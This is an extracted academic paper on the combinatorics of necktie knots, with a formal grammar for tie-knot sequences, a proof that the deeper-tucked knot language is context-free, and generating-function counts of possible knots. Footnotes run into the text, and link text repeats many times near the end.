the abstract tokens. Further common symbols are ∗, the Kleene star, that denotes an arbitrary number of repetitions of the previous token (or group in brackets), and |, denoting a choice of one of the adjoining options. THE ANATOMY OF A NECKTIE In the following, we will often refer to various parts and constructions with a necktie. We call the ends of a necktie blades, and distinguish between the broad blade and the thin blade1—see Fig. 2 for these names. The tie-knot can be divided up into a body, consisting of 1 There are neckties without a width difference between the ends. We ignore this distinction for this paper. all the twists and turns that are not directly visible in the final knot, and a façade, consisting of the parts of the tie actually visible in the end. In Fig. 3 we demonstrate this distinction. The body builds up the overall shape of the tie-knot, while the façade gives texture to the front of the knot. The enumeration of Fink and Mao only considers knots with trivial façades, while these later inventions all consider more interesting façades. As a knot is in place around a wearer, the Y-shape of the tie divides the torso into 3 regions: Left, Center and Right—as shown to the right in Fig. 2. A tie-knot has to be tied by winding and tucking one of the two blades around the other: if both blades are active, then the tie can no longer be adjusted in place for a comfortable fit. We shall refer to the blade used in tying the knot as the leading blade or the active blade. Each time the active blade is moved across the tie-knot—in front or in back—we call the part of the tie laid on top of the knot a bow. A LANGUAGE FOR TIE-KNOTS Fink & Mao (2000) observe that once the first crossing has been made, the wrapping sequence of a classical tie-knot is completely decided by the sequence of regions into which the broad blade is moved. Adorning the region specifications with a direction—is the tie moving away from the wearer or towards the wearer—they establish a formal alphabet for describing tie-knots with 7 symbols. We reproduce their construction here, using U for the Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 3/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 Figure 3 Different examples of tie knots. Left, a 4-in-hand; middle, a double windsor; right a trinity. The 4-in-hand and double windsor share the flat façade but have different bodies producing different shapes. The trinity has a completely different façade, produced by a different wind and tuck pattern. move to tuck the blade U nder the tie itself.2 The notation proposed by Fink & Mao (2000) 2 Fink and Mao used T for Tuck. interprets repetitions U k of U as tucking the blade k bows under the top. It turns out that the complexity analysis is far simpler if we instead write U k for tucking the blade under the bow that was produced 2k windings ago. This produces a language on the alphabet: {L⊗,L⊙,C⊗,C⊙,R⊗,R⊙,U} They then introduce relations and restrictions on these symbols: T ie1 No region (L,C,R) shall repeat: after an L only C or R are valid next regions. U moves do not influence this. T ie2 No direction (⊙—out of the paper, ⊗—in towards the paper) shall repeat: after an outwards move, the next one must go inwards. U moves do not influence this. T ie3 Tucks (U ) are valid after an outward move. T ie4 A tie-knot can end only on one of C⊗,C⊙ or U . In fact, almost all classical knots end on U .3 3 The exemption here being the Onassis style knot, favored by the eponymous shipping magnate, where after a classical knot the broad blade is brought up with a C⊙ move to fall in front of the knot, hiding the knot completely. T ie5 A k-fold tuck U k is only valid after at least 2k preceding moves. Fink & Mao (2000) do not pay much attention to the conditions on k-fold tucks, since these show up in their enumeration as stylistic variations, exclusively at the end of a knot. This collection of rules allow us to drastically shrink the tie language, both in alphabet and axioms. Fink & Mao are careful to annotate whether tie-knot moves go outwards or inwards at any given point. We note that the inwards/outwards distinction follows as a direct consequence of axioms T ie2, T ie3 and T ie4. Since non-tuck moves must alternate between inwards and outwards, and the last non-tuck move must be outwards, the orientation of any sequence of moves follows by backtracking from the end of the string. Hence, when faced with a non-annotated string like RCLCRCLCRCLRURCLU Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 4/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 we can immediately trace from the tail of the knot string: the last move before the final tuck must be outwards, so that L must be a L⊙. So it must be preceded by R⊙C⊗. Tracing backwards, we can specify the entire string above to R⊗C⊙L⊗C⊙R⊗C⊙L⊗C⊙R⊗C⊙L⊗R⊙UC⊗R⊙C⊗L⊙U Next, the axiom T ie1 means that a sequence will not contain either of LU∗L,CU∗C,RU∗R as subsequences.4 Hence, the listing of regions is less important than the direction of 4 Recall that the Kleene star F∗ is used to denote sequences of 0 or more repetitions of the string F. transition: any valid transition is going to go either clockwise or counterclockwise.5 5 Say, as seen on the mirror image. Changing this convention does not change the count, as long as the change is consequently done. Writing T for clockwise6 and W for counterclockwise,7 we can give a strongly reduced 6 T for Turnwise. 7 W for Widdershins. tie language on the alphabet T, W, U. To completely determine a tie-knot, the sequence needs a starting state: an annotation on whether the first crossing of a tie-knot goes across to the right or to the left. In such a sequence, a U instruction must be followed by either T or W dictating which direction the winding continues after the tuck, unless it is the last move of the tie: in this case, the blade is assumed to continue straight ahead—down in front for most broad-blade tie-knots, tucked in under the collar for most thin-blade knots. The position of the leading blade after a sequence of W/T windings is a direct result of #W − #T(mod 3). This observation allows us to gain control over several conditions determining whether a distribution of U symbols over a sequence of W/T produces a physically viable tie-knot. Theorem 1. A position in a winding sequence is valid for a k-fold tuck if the sub-sequence of the last 2k W or T symbols is such that either 1. starts with W and satisfies #W − #T = 2 (mod 3) 2. starts with T and satisfies #T − #W = 2 (mod 3). Proof. The initial symbol produces the bow under which the tuck will go. If the initial symbol goes, say, from R to L, then the tuck move needs to come from C in order to go under the bow. In general, a tuck needs to come from the one region not involved in the covering bow. Every other bow goes in front of the knot, and the others go behind the knot. Hence, there are 2k − 1 additional winding symbols until the active blade returns to the right side of the knot. During these 2k − 1 symbols, we need to transition one more step around the sequence of regions. The transitions W and T are generator and inverse for the cyclic group of order 3, concluding the proof. � It is worth noticing here that a particular point along a winding can be simultaneously valid for both a k-fold and an m-fold tuck for k ≠ m. One example would be in the winding string TWTT: ending with TT, it is a valid site for a 1-fold tuck producing TWTTU, and since TWTT starts with T and has 2 more T than W, it is also a valid site for a 2-fold tuck producing TWTTUU. We will revisit this example below, in ‘Recursive tucks.’ We may notice that with the usual physical constraints on a tie—where we have experimentally established that broad blade ties tend to be bounded by 9 moves, and thin blade ties by 15 moves, we can expect that no meaningful tuck deeper than 7 will ever Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 5/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 be relevant; 4 for the broad blade ties. The bound of 4 is achieved in the enumeration by Fink & Mao (1999). In our enumeration, we will for the sake of comfort focus on ties up to 13 moves. LANGUAGE COMPLEXITY In this section, we examine the complexity features of the tie-knot language. Due to the constraints we have already observed on the cardinality of W and T, we will define a grammar for this language. We will write this grammar with a Backus–Naur form. Although in practice it is only possible to realise finite strings in the tie-knot language due to the physical properties of fabric, we assume an arbitrarily long (but finite), infinitely thin tie. Single-depth tucks The classical Fink and Mao system has a regular grammar, given by ⟨tie⟩ ::= L⟨L⟩ ⟨lastR⟩ ::= L⟨lastL⟩ | C⟨lastC⟩ | LCU ⟨lastL⟩ ::= R⟨lastR⟩ | C⟨lastC⟩ | RCU ⟨lastC⟩ ::= L⟨lastL⟩ | R⟨lastR⟩ We use the symbol ⟨lastR⟩ to denote the rule that describes what can happen when the last move seen was an R. Hence, at any step in the grammar, some tie knot symbol is emitted, and the grammar continues from the state that symbol was the last symbol emitted. The above grammar works well if the only tucks to appear are at the end. For intermediate tucks, and to avoid tucks to be placed at the back of the knot (obeying T ie3), we would need to keep track of winding parity: tucks are only valid an even number of winding steps from the end. We can describe this with a regular grammar. For the full tie-knot language, the grammar will end up context-free, as we will see in ‘Recursive tucks.’ ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= T | W | ϵ ⟨pair⟩ ::= (T|W)(T|W) ⟨tuck⟩ ::= TTU | WWU The distribution of T and W varies by type of knot: for classical knots, #W − #T = 2 (mod 3); for modern knots that tuck to the right, #W − #T = 1 (mod 3); and for modern knots that tuck to the left, #W − #T = 0 (mod 3). This grammar does not discriminate between these three sub-classes. In order to track these sub-classes, the RLC-notation is easier. In order to rebuild this grammar to one based on the RLC-notation, note that from L a T takes us to C and a W takes us to R. So from a ⟨lastT⟩ residing at L, we have the options: W to Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 6/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 R, T to C, or TU to C. In particular, there is a ⟨lastT⟩ at L if we arrived from R. Hence, the TU option can be seen as being a TTU option executing from the preceding R state. There is thus, at any given position in the tie sequence, the options of proceeding with a T or a W, or to proceed with one of TTU or WWU. In the latter two cases, we can also accept the string. Starting at L, these options take us—in order—to C, to R, to CRU and to RCU respectively. This observation extends by symmetry to all stages, giving the grammar below. ⟨lastR⟩ ::= LR⟨lastR⟩ | CR⟨lastR⟩ | LC⟨lastC⟩ | CL⟨lastL⟩ | LCU[⟨lastC⟩] | CLU[⟨lastL⟩] ⟨lastL⟩ ::= RL⟨lastL⟩ | CL⟨lastL⟩ | RC⟨lastC⟩ | CR⟨lastR⟩ | RCU[⟨lastC⟩] | CRU[⟨lastR⟩] ⟨lastC⟩ ::= LC⟨lastC⟩ | RC⟨lastC⟩ | LR⟨lastR⟩ | RL⟨lastL⟩ | LRU[⟨lastR⟩] | RLU[⟨lastL⟩] ⟨tie⟩ ::= L(⟨lastL⟩ | R⟨lastR⟩ | C⟨lastC⟩) By excluding some the exit rules, this allows us to enumerate novel tie-knots with a specific ending direction, which will be of interest later on. Recursive tucks We can write a context-free grammar for the arbitrary depth tuck tie-knots. ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= T | W | ϵ ⟨pair⟩ ::= (T|W)(T|W) ⟨tuck⟩ ::= ⟨ttuck2⟩ | ⟨wtuck2⟩ ⟨ttuck2⟩ ::= TT⟨w0⟩U | TW⟨w1⟩U ⟨wtuck2⟩ ::= WW⟨w0⟩U | WT⟨w2⟩U ⟨w0⟩ ::= WW⟨w1⟩U | WT⟨w0⟩U | TW⟨w0⟩U|TT⟨w2⟩U | ⟨ttuck2⟩’⟨w2⟩U | ⟨wtuck2⟩’⟨w1⟩U | ϵ ⟨w1⟩ ::= WW⟨w2⟩U | WT⟨w1⟩U | TW⟨w1⟩U|TT⟨w0⟩U | ⟨ttuck2⟩’⟨w0⟩U | ⟨wtuck2⟩’⟨w2⟩U ⟨w2⟩ ::= WW⟨w0⟩U | WT⟨w2⟩U | TW⟨w2⟩U|TT⟨w1⟩U | ⟨ttuck2⟩’⟨w1⟩U | ⟨wtuck2⟩’⟨w0⟩U Note that the validity of a tuck depends only on the count of T and W in the entire sequence comprising the tuck, and not the validity of any tucks recursively embedded into it. For instance, TWTT is a valid depth-2-tuckable sequence, as is its embedded depth-1-tuckable sequence TT. However, TTWT is also a valid depth-2-tuckable sequence, even though WT is not a valid depth-1-tuckable sequence. We introduce the symbol ’ to delineate different tucks that may come in immediate sequence, such as happens in the tie knot TWTTU’UU. Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 7/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 Classification of the tie-knot language If we limit our attention to only the single-depth tie-knots described in ‘Single-depth tucks,’ then the grammar is regular, proving that this tie language is a regular language and can be described by a finite automaton. In particular this implies that the tie-knot language proposed by Fink & Mao (1999) is regular. In fact, an automaton accepting these tie-knots is given by: After the prefix, execution originates at the middle node, but has to go outside and return before the machine will accept input. This maintains the even length conditions required by T ie3. As for the deeper tucked language in ‘Recursive tucks’, the grammar we gave shows it to be at most context-free. Whether it is exactly context-free requires us to exclude the existence of a regular grammar. Theorem 2. The deeper tucked language is context-free. Proof. Our grammar in ‘Recursive tucks’ already shows that the language for deeper tucked tie-knots is either regular or context-free: it produces tie-knot strings with only single non-terminal symbols to the left of each production rule. It remains to show that this language cannot be regular. To do this, we use the pumping lemma for regular languages. Recall that the pumping lemma states that for every regular language there is a constant p such that for any word w of length at least p, there is a decomposition w = xyz such that |xy| ≤ p, |y| ≥ 1 and xyiz is a valid string for all i > 0. Since the reverse of any regular language is also regular, the pumping lemma has an alternative statement that requires |yz| ≤ p instead. We shall be using this next. Suppose there is such a p. Consider the tie-knot TTW6q−2U3q for some q > p/3. Any decomposition such that |yz| ≤ p will be such that y and z consist of only U symbols. In particular y consists of only U symbols. Hence, for sufficiently large values of i, there are too few preceding T/W-symbols to admit that tuck depth. Hence the language is not regular. � Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 8/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 ENUMERATION We can cut down the enumeration work by using some apparent symmetries. Without loss of generality, we can assume that a tie-knot starts by putting the active blade in region R: any knot starting in the region L is the mirror image of a knot that starts in R and swaps all W to T and vice versa. Generating functions Generating functions have proven a powerful method for enumerative combinatorics. One very good overview of the field is provided by the textbooks by Stanley (1997) and Stanley (1999). Their relevance to formal languages is based on a paper by Chomsky & Schützenberger (1959) that studied context-free grammars using formal power series. More details will appear in the (yet unpublished) Handbook AutoMathA (Gruber, Lee & Shallit, 2012). A generating function for a series an of numbers is a formal power series A(z) = ∞ j=0 ajz j such that the coefficient of the degree k term is precisely ak. Where ak and bk are counts of “things of size k” of type a or b respectively, the sum of the corresponding generating functions is the count of “things of size k” across both categories. If gluing some thing of type a with size j to some thing of type b with size k produces a thing of size j + k, then the product of the generating functions measures the counts of things you get by gluing things together between the two types. For our necktie-knot grammars, the sizes are the winding lengths of the ties, and it is clearly the case that adding a new symbol extends the size (thus is a multiplication action), and taking either one or another rule extends the items considered (thus is an additive action). The Maple8 package combstruct has built-in functions for computing a generating 8 Maple is a trademark of Waterloo Maple Inc. The computations of generating functions in this paper were performed by using Maple. function from a grammar specification. Using this, and the grammars we state in ‘Single-depth tucks,’ we are able to compute generating functions for both the winding counts and the necktie counts for both Fink and Mao’s setting and the single-depth tuck setting. • The generating function for Fink and Mao necktie-knots is z3 (1 + z)(1 − 2z) = z3 + z4 + 3z5 + 5z6 + 11z7 + 21z8 + 43z9 + O(z10). • The generating function for single tuck necktie-knots is 2z3(2z + 1) 1 − 6z2 = 2z3 + 4z4 + 12z5 + 24z6 + 72z7 + 144z8 + 432z9 + 864z10 + 2,592z11 + 5,184z12 + 15,552z13 + O(z14). • By removing final states from the BNF grammar, we can compute corresponding generating functions for each of the final tuck destinations. For an R-final tuck, we remove all final states except for CRU and LRU, making the non-terminal symbol mandatory for all other tuck sequences. For L, we remove all Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 9/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 but CLU and RLU. For C, we remove all but RCU and LCU. This results in the following generating functions for R-final, L-final and C-final sequences, respectively. z3(2z3 − 2z2 + z + 1) 1 − 6z2 = z3 + z4 + 4z5 + 8z6 + 24z7 + 48z8 + 144z9 + 288z10 + 864z11 + 1,728z12 + 5,184z13 + O(z14) 2z4(2z2 − 2z − 1) 1 − 6z2 = 2z4 + 4z5 + 8z6 + 24z7 + 48z8 + 144z9 + 288z10 + 864z11 + 1,728z12 + 5,184z13 + O(z14) z3(2z3 − 2z2 + z + 1) 1 − 6z2 = z3 + z4 + 4z5 + 8z6 + 24z7 + 48z8 + 144z9 + 288z10 + 864z11 + 1,728z12 + 5,184z13 + O(z14). • Removing the references to the tuck move, we recover generating functions for the number of windings available for each tie length. We give these for R-final, L-final and C-final respectively. Summed up, these simply enumerate all possible T/W-strings of the corresponding lengths, and so run through powers of 2. z3 1 − z − 2z2 = z3 + z4 + 3z5 + 5z6 + 11z7 + 21z8 + 43z9 + 85z10 + 171z11 + 341z12 + 683z13 + O(z14) 2z4 (1 − 2z)(1 + z) = 2z4 + 2z5 + 6z6 + 10z7 + 22z8 + 42z9 + 86z10 + 170z11 + 342z12 + 682z13 + O(z14) z3 1 − z − 2z2 = z3 + z4 + 3z5 + 5z6 + 11z7 + 21z8 + 43z9 + 85z10 + 171z11 + 341z12 + 683z13 + O(z14). • For the full grammar of arbitrary depth knots, we set w to be a root of (8z6 − 4z4)ζ 3 + (−8z6 + 18z4 − 7z2)ζ 2 + (−16z6 + 14z4 − 6z2 + 2)ζ − 12z4 + 9z2 − 2 = 0 solved for ζ . Then the generating function for this grammar is: − 1 8z4 − 11z2 + 3  64w2z7 − 128wz7 + 32w2z6 − 64wz6 − 48z5w2 + 216z5w − 24w2z4 − 96z5 + 108wz4 + 8w2z3 − 48z4 − 110wz3 + 4w2z2 + 82z3 − 55z2w + 41z2 + 16zw − 16z + 8w − 8  = 2z2 + 4z3 + 20z4 + 40z5 + 192z6 + 384z7 + 1,896z8 + 3,792z9 + 19,320z10 + 38,640z11 + 202,392z12 + 404,784z13 + 2,169,784z14 + O(z15). Tables of counts For ease of reading, we extract the results from the generating functions above to more easy-to-reference tables here. Winding length throughout refers to the number of R/L/C symbols occurring, and thus is 1 larger than the W/T count. The cases enumerated by Fink & Mao (2000) are Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 10/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 Winding length 3 4 5 6 7 8 9 Total # tie-knots 1 1 3 5 11 21 43 85 A knot with the thick blade active will cover up the entire knot with each new bow. As such, all thick blade active tie-knots will fall within the classification by Fink & Mao (2000). The modern case, thus, deals with thin blade active knots. As evidenced by the Trinity and the Eldredge knots, thin blade knots have a wider range of interesting façades and of interesting tuck patterns. For thick blade knots, it was enough to assume that the tuck happens last, and from the C region, the thin blade knots have a far wider variety. The case remains that unless the last move is a tuck—or possibly finishes in the C region—the knot will unravel from gravity. We can thus expect this to be a valid require- ment for the enumeration. There are often more valid tuck sites than the final position in a knot, and the tuck need no longer come from the C region: R and L are at least as valid. The computations in ‘Generating functions’ establish Winding length 3 4 5 6 7 8 9 10 11 12 13 Total # left windings 0 2 2 6 10 22 42 86 170 342 682 1,364 # right windings 1 1 3 5 11 21 43 85 171 341 683 1,365 # center windings 1 1 3 5 11 21 43 85 171 341 683 1,365 # left knots 0 2 4 8 24 48 144 288 864 1,728 5,184 8,294 # right knots 1 1 4 8 24 48 144 288 864 1,728 5,184 8,294 # center knots 1 1 4 8 24 48 144 288 864 1,728 5,184 8,294 # single tuck knots 2 4 12 24 72 144 432 864 2,592 4,146 15,552 24,882 total # knots 2 4 20 40 192 384 1,896 3,792 19,320 38,640 202,392 266,682 The first point where the singly tucked knots and the full range of knots deviate is at the knots with winding length 4; there are 12 singly tucked knots, and 8 knots that allow for a double tuck, namely: TTTTU TTWWU TWTTU TWWWU WTTTU WTWWU WWTTU WWWWU TTUTTU TTUWWU WWUTTU WWUWWU TTTWUU TTWTUU TWTTUU TWTTU’UU WTWWUU WTWWU’UU WWTWUU WWWTUU The reason for the similarity between the right and the center counts is that the winding sequences can be mirrored. Left-directed knots are different since the direction corresponds to the starting direction. Hence, a winding sequence for a center tuck can be mirrored to a winding sequence for a right tuck. In the preprint version of this paper, we claimed the total count of knots using only single-depth tucks to be 177,147. During the revision of the paper, we have discovered two errors in this claim: Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 11/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 1. There is an off-by-one error in this count. 2. This count was done for tie-knots that allow tucks that are hidden behind the knot. Adding this extra space to the generating grammar produces the generating function 2z3 + 6z4 + 18z5 + 54z6 + 162z7 + 486z8 + 1,458z9 + 4,374z10 + 13,122z11 + 39,366z12 + 118,098z13 + O(z14) with a total of 177,146 tie-knots with up to 13 moves. AESTHETICS Fink & Mao (2000) propose several measures to quantify the aesthetic qualities of a necktie-knot; notably symmetry and balance, corresponding to the quantities #R − #L and the number of transitions from a streak of W to a streak of T or vice versa. By considering the popular thin-blade neck tie-knots: the Eldredge and the Trinity, as described in Krasny (2012a) and Krasny (2012b), we can immediately note that balance no longer seems to be as important for the look of a tie-knot as is the shape of its façade. Symmetry still plays an important role in knots, and is easy to calculate using the CLR notation for tie-knots. Knot TW-string CLR-string Balance Symmetry Eldredge TTTWWTTUTTWWU LCRLRCRLUCRCLU 3 0 Trinity TWWWTTTUTTU LCLRCRLCURLU 2 1 We do not in this paper attempt to optimize any numeric measures of aesthetics, as this would require us to have a formal and quantifiable measure of the knot façades. This seems difficult with our currently available tools. CONCLUSION In this paper, we have extended the enumeration methods originally used by Fink & Mao (2000) to provide a larger enumeration of necktie-knots, including those knots tied with the thin blade of a necktie to produce ornate patterns in the knot façade. We have found 4,094 winding patterns that take up to 13 moves to tie and are anchored by a final single depth tuck, and thus are reasonable candidates for use with a normal necktie. We chose the number of moves by examining popular thin-blade tie-knots—the Eldredge tie-knot uses 12 moves—and by experimentation with our own neckties. Most of these winding patterns allow several possible tuck patterns, and thus the 4,094 winding patterns give rise to 24,882 singly tucked tie-knots. We have further shown that in the limit, the language describing neck tie-knots is context free, with a regular sub-language describing these 24,882 knots. These counts, as well as the stated generating functions, are dependent on the correctness of the combstruct package in Maple, and the correctness of our encoding of these grammars as Maple code. We have checked the small counts and generated strings Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 12/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 for each of the grammars against experiments with a necktie and with the results by Fink and Mao and our own catalogue. Questions that remain open include: • Find a way to algorithmically divide a knot description string into a body/façade distinction. • Using such a distinction, classify all possible knot façades with reasonably short necktie lengths. We have created a web-site that samples tie-knots from knots with at most 12 moves and displays tying instructions: http://tieknots.johanssons.org. The entire website has also been deposited with Figshare (Vejdemo-Johansson, 2015). All the code we have used, as well as a table with assigned names for the 2,046 winding patterns for up to 12 moves are provided as Supplemental Information to this paper. Winding pattern names start with R, L or C depending on the direction of the final tuck, and then an index number within this direction. We suggest augmenting this with the bit-pattern describing which internal tucks have been added—so that e.g., the Eldredge would be L-373.4 (including only the 3rd potential tuck from the start) and the Trinity would be L-110.2 (including only the 2nd potential tuck). Thus, any single-depth tuck can be concisely addressed. ACKNOWLEDGEMENTS We would like to thank the reviewers, whose comments have gone a long way to make this a far better paper, and who have caught several errors that marred not only the presentation but also the content of this paper. Reviewer 1 suggested a significant simplification of the full grammar in ‘Recursive tucks,’ which made the last generating function at all computable in reasonable time and memory. Reviewer 2 suggested we look into generating functions as a method for enumerations. As can be seen in ‘Generating functions,’ this suggestion has vastly improved both the power and ease of most of the results and calculations we provide in the paper. For these suggestions in particular and all other suggestions in general we are thankful to both reviewers. ADDITIONAL INFORMATION AND DECLARATIONS Funding MVJ was partially supported for this work by the 7th Framework Programme through the project Toposys (FP7-ICT-318493-STREP). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: 7th Framework Programme: FP7-ICT-318493-STREP. Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 13/15 https://peerj.com/computer-science/ http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2 Competing Interests DH and MLP are employees of Upstanding Hackers Inc. Author Contributions • Dan Hirsch and Anders Sandberg analyzed the data, wrote the paper, reviewed drafts of the paper. • Ingemar Markström analyzed the data, performed the computation work, reviewed drafts of the paper. • Meredith L. Patterson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • Mikael Vejdemo-Johansson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Deposition The following information was supplied regarding the deposition of related data: Figshare: http://dx.doi.org/10.6084/m9.figshare.130013. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.2#supplemental-information. REFERENCES Chomsky N, Schützenberger M P. 1959. The algebraic theory of context-free languages. Studies in Logic and the Foundations of Mathematics 26:118–161. Fink T, Mao Y. 1999. Designing tie knots by random walks. Nature 398(6722):31–32 DOI 10.1038/17938. Fink T, Mao Y. 2000. Tie knots, random walks and topology. Physica A: Statistical Mechanics and its Applications 276(1):109–121 DOI 10.1016/S0378-4371(99)00226-5. Fink T, Mao Y. 2001. The 85 ways to tie a tie. London: Fourth Estate. Gruber H, Lee J, Shallit J. 2012. Enumerating regular expressions and their languages. ArXiv preprint. arXiv:1204.4982. Knorr A. 2010. Eldredge reloaded. http://xirdalium.net. [Blog Post] Available at http://xirdalium. net/2010/06/20/eldredge-reloaded/ (accessed 26 December 2012). Krasny A. 2012a. Eldredge tie knot—how to tie a eldredge necktie knot. http://agreeordie.com. [Blog Post] Available at http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge- knot (accessed 26 December 2012). Krasny A. 2012b. Trinity tie knot—how to tie a trinity necktie knot. http://agreeordie.com. [Blog Post] Available at http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott (accessed 26 December 2012). Sipser M. 2006. Introduction to the theory of computation. Vol. 2. Boston: Thomson Course Technology. Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 14/15 https://peerj.com/computer-science/ http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information 